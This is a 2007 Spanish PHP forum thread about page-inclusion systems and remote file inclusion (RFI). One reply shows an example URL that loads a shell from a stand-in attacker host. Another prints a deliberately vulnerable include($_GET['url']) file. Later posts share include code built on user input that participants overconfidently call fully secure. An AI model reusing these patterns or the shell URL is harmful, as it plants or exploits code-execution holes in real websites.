Autor Tema: Sistema de Modulación [index.php?id=seccion]  (Leído 30563 veces)

Desconectado FeDe

  • PHPero Avanzado
  • ****
  • Mensajes: 448
  • Karma: 35
  • Sexo: Masculino
  • BaDyDj -> ¡Mi Stylo, Mi ViDa!
    • Ver Perfil
Re: Sistema de Modulación [index.php?id=seccion]
« Respuesta #15 en: 13 de Julio de 2007, 23:45:55 pm »
Buenas,

El problema los codigos que son hackeables mediante RFI es que directamente hacen algo como:

include($_GET['id'].".php");

Con esto pueden hackearte directamente haciendo algo como:

http://www.tuweb.com/?id=http://www.webdelhacker.com/ruta_shell

Todos los archivos php podrán ser incrustados en tu web y de esta forma seria hackeada.

No todos, porque hay servidores que tienen safe_mode activado (en el php.ini), por lo tanto no funciaría ;)

Saludos.
Sin Firma me haces una? :P

Comunidad PHPeros

Re: Sistema de Modulación [index.php?id=seccion]
« Respuesta #15 en: 13 de Julio de 2007, 23:45:55 pm »

Desconectado lalitros

  • PHPer@ Fijo
  • ***
  • Mensajes: 162
  • Karma: 3
  • Sexo: Masculino
    • Ver Perfil
Re: Sistema de Modulación [index.php?id=seccion]
« Respuesta #16 en: 08 de Agosto de 2007, 06:09:33 am »
No es hackeable mediante RFI ;)
COMPROBADO - Seguro al 100%
Y todo eso, de donde lo sacas eh?
Me parece muy interesante. Eres muy muy GRANDE naveda!
« Última modificación: 08 de Agosto de 2007, 06:11:07 am por lalitros »

Si me dieran a escojer entre el MUNDO y Tu.. Te escojeria a Ti, porque mi MUNDO ERES TU

Desconectado G2K

  • Moderador de Programación General
  • PHPero Master
  • ****
  • Mensajes: 2.245
  • Karma: 76
  • Sexo: Masculino
  • Dame un punto de apoyo y moveré la Tierra
    • Ver Perfil
    • Cristian Torrijos
Re: Sistema de Modulación [index.php?id=seccion]
« Respuesta #17 en: 08 de Agosto de 2007, 08:33:59 am »
De donde lo va a sacar? de su celebro xD
No es hackeable por RFI porque es imposible incluir un archivo exterior y si digo imposible es imposible xD

Un saludo ;)
Campeón del CatSkills de Webs (Enero 2011)
Campeón del SpainSkills de Webs (Abril 2011)
http://www.youtube.com/watch?v=1fBMG8F_hpM
Mejor representante catalan en SpainSkills 2011


Desconectado FeDe

  • PHPero Avanzado
  • ****
  • Mensajes: 448
  • Karma: 35
  • Sexo: Masculino
  • BaDyDj -> ¡Mi Stylo, Mi ViDa!
    • Ver Perfil
Re: Sistema de Modulación [index.php?id=seccion]
« Respuesta #18 en: 08 de Agosto de 2007, 12:52:40 pm »
Buenas,

No es imposible tampoco,, se podría hacer teniendo un archivo llamado remoto.php que cogiera & incluyera la url vía GET

remoto.php
<?
include($_GET["url"]);
?>


Y accediendo así ?id=remoto&url=url , se podría acceder ;), aunque sería de bobos hacer eso... pero alguno habrá..

Saludos :)
Sin Firma me haces una? :P

Desconectado naveda

  • Administrador General
  • PHPero Master
  • *****
  • Mensajes: 2.282
  • Karma: 165
  • Sexo: Masculino
    • Ver Perfil
    • naveda.me
Re: Sistema de Modulación [index.php?id=seccion]
« Respuesta #19 en: 08 de Agosto de 2007, 16:08:01 pm »
Buenas,

No es imposible tampoco,, se podría hacer teniendo un archivo llamado remoto.php que cogiera & incluyera la url vía GET

remoto.php
<?
include($_GET["url"]);
?>


Y accediendo así ?id=remoto&url=url , se podría acceder ;), aunque sería de bobos hacer eso... pero alguno habrá..

Saludos :)

El se referia al codigo que yo he puesto.
Por favor, leete las Normas


Desconectado FeDe

  • PHPero Avanzado
  • ****
  • Mensajes: 448
  • Karma: 35
  • Sexo: Masculino
  • BaDyDj -> ¡Mi Stylo, Mi ViDa!
    • Ver Perfil
Re: Sistema de Modulación [index.php?id=seccion]
« Respuesta #20 en: 08 de Agosto de 2007, 16:28:44 pm »
Buenas,

Si, pero bueno yo doy posibilidades de hackeo, pero hay que ser muy bobo para hacer eso ;)

Saludos :P
Sin Firma me haces una? :P

Desconectado G2K

  • Moderador de Programación General
  • PHPero Master
  • ****
  • Mensajes: 2.245
  • Karma: 76
  • Sexo: Masculino
  • Dame un punto de apoyo y moveré la Tierra
    • Ver Perfil
    • Cristian Torrijos
Re: Sistema de Modulación [index.php?id=seccion]
« Respuesta #21 en: 08 de Agosto de 2007, 17:33:01 pm »
Fede muy bobo no... cualquier principiante o cualquier programador que pueda tener un despiste pum ya metio la pata ;)
Campeón del CatSkills de Webs (Enero 2011)
Campeón del SpainSkills de Webs (Abril 2011)
http://www.youtube.com/watch?v=1fBMG8F_hpM
Mejor representante catalan en SpainSkills 2011


Desconectado javier_modding

  • PHPerit@
  • *
  • Mensajes: 30
  • Karma: 0
    • Ver Perfil
Re: Sistema de Modulación [index.php?id=seccion]
« Respuesta #22 en: 18 de Agosto de 2007, 07:54:12 am »
naveda sabes hise todo eso con mi web con diseño etc pero me sale como 20 veces la web
para abajo -.-!

Desconectado G2K

  • Moderador de Programación General
  • PHPero Master
  • ****
  • Mensajes: 2.245
  • Karma: 76
  • Sexo: Masculino
  • Dame un punto de apoyo y moveré la Tierra
    • Ver Perfil
    • Cristian Torrijos
Re: Sistema de Modulación [index.php?id=seccion]
« Respuesta #23 en: 18 de Agosto de 2007, 10:52:35 am »
hombre logico... seguramente lo abras puesto abajo del codigo la web y fuera de la tabla que le toca xD
Campeón del CatSkills de Webs (Enero 2011)
Campeón del SpainSkills de Webs (Abril 2011)
http://www.youtube.com/watch?v=1fBMG8F_hpM
Mejor representante catalan en SpainSkills 2011


Desconectado javier_modding

  • PHPerit@
  • *
  • Mensajes: 30
  • Karma: 0
    • Ver Perfil
Re: Sistema de Modulación [index.php?id=seccion]
« Respuesta #24 en: 19 de Agosto de 2007, 04:30:39 am »
osea creo un marco o una tabla cosa que se abra ahy la porqueria aaa ya entendi lol XDDDDD  :P :P :P :P :P

Desconectado Adidi

  • PHPer@ Fijo
  • ***
  • Mensajes: 123
  • Karma: 0
    • Ver Perfil
Re: Sistema de Modulación [index.php?id=seccion]
« Respuesta #25 en: 20 de Agosto de 2007, 13:17:10 pm »
Buenas  ;D

Lo qué yo sigo teniendo problemas. Siempre pongo un sistema de modulación, pero esta vez, me da por ponerlo y no me sale nada en la web :S
No lo entiendo.

en el index pongo:
 
Código: [Seleccionar]
<?PHP
if (isset($_GET['id'])) {
if (!empty($_GET['id']) && $_GET['id'] != "index") {
if (file_exists($_GET['id'].".php")) {
include ($_GET['id'].".php");
} else {
echo "No existe esta seccion";
}
} else {
include ("principal.php");
}
} else {
include ("principal.php");
}
?>

Y de hipervinculo
Código: [Seleccionar]
index.php?id=secciony creo el archivo principal, y en ese archivo pongo lo que quiero, pero una vez creado eso
en la web, no me sale nada  :'(

Alguien me puede ayudar?
Merci

Desconectado G2K

  • Moderador de Programación General
  • PHPero Master
  • ****
  • Mensajes: 2.245
  • Karma: 76
  • Sexo: Masculino
  • Dame un punto de apoyo y moveré la Tierra
    • Ver Perfil
    • Cristian Torrijos
Re: Sistema de Modulación [index.php?id=seccion]
« Respuesta #26 en: 20 de Agosto de 2007, 13:23:17 pm »
Tienes que ponerle de nombre al archivo igual del que quieres que ponga en id=nombre_del_archivo_a_incluir
Campeón del CatSkills de Webs (Enero 2011)
Campeón del SpainSkills de Webs (Abril 2011)
http://www.youtube.com/watch?v=1fBMG8F_hpM
Mejor representante catalan en SpainSkills 2011


Desconectado Adidi

  • PHPer@ Fijo
  • ***
  • Mensajes: 123
  • Karma: 0
    • Ver Perfil
Re: Sistema de Modulación [index.php?id=seccion]
« Respuesta #27 en: 20 de Agosto de 2007, 13:31:27 pm »
Tienes que ponerle de nombre al archivo igual del que quieres que ponga en id=nombre_del_archivo_a_incluir

Haber eso ya lo ago >.<
por ejemplo yo pongo
index.php?id=serdj
y esque no me va >.<

Es qué no lo entiendo, sigo todo los pasos que me dice naveda, pero nada.. no me sale :S
« Última modificación: 20 de Agosto de 2007, 13:33:10 pm por Adidi »

Desconectado G2K

  • Moderador de Programación General
  • PHPero Master
  • ****
  • Mensajes: 2.245
  • Karma: 76
  • Sexo: Masculino
  • Dame un punto de apoyo y moveré la Tierra
    • Ver Perfil
    • Cristian Torrijos
Re: Sistema de Modulación [index.php?id=seccion]
« Respuesta #28 en: 20 de Agosto de 2007, 13:56:27 pm »
Algo debes hacer mal! FIJO!

Repasatelo porfavor ;)
Campeón del CatSkills de Webs (Enero 2011)
Campeón del SpainSkills de Webs (Abril 2011)
http://www.youtube.com/watch?v=1fBMG8F_hpM
Mejor representante catalan en SpainSkills 2011


Desconectado Adidi

  • PHPer@ Fijo
  • ***
  • Mensajes: 123
  • Karma: 0
    • Ver Perfil
Re: Sistema de Modulación [index.php?id=seccion]
« Respuesta #29 en: 20 de Agosto de 2007, 13:59:34 pm »
Algo debes hacer mal! FIJO!

Repasatelo porfavor ;)

Haber... xDDDDD
Qué me lo e repasado 200 veces
y un amigo mio me lo esta repasando, y dice que tampoco encuentra el error :S

Que ago?  :(

Recuerdo qué puse esto:
Código: [Seleccionar]
<?PHP
if (isset($_GET['id'])) {
if (!empty($_GET['id']) && $_GET['id'] != "index") {
if (file_exists($_GET['id'].".php")) {
include ($_GET['id'].".php");
} else {
echo "No existe esta seccion";
}
} else {
include ("principal.php");
}
} else {
include ("principal.php");
}
?>

Y para las secciones pongo:
Código: [Seleccionar]
index.php?id=secciony lo de seccion, se que ai que cambiarlo, que no soy tonto xD
« Última modificación: 20 de Agosto de 2007, 14:02:11 pm por Adidi »